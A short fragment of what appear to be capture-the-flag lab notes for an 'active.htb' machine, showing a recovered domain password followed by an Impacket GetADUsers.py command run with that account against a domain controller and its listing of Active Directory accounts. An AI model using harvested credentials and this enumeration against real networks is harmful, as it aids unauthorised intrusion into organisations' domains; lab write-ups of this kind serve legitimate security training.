PASSWORD: GPPstillStandingStrong2k18
************************************

GetADUsers.py -all active.htb/svc_tgs -dc-ip 10.10.10.100
Impacket v0.9.18 - Copyright 2018 SecureAuth Corporation

Password:
[*] Querying 10.10.10.100 for information about domain.
Name                  Email                           PasswordLastSet      LastLogon
--------------------  ------------------------------  -------------------  -------------------
Administrator                                         2018-07-18 15:06:40  2018-12-18 06:16:32
Guest                                                 <never>              <never>
krbtgt                                                2018-07-18 14:50:36  <never>
SVC_TGS                                               2018-07-18 16:14:38  2018-12-18 12:54:20
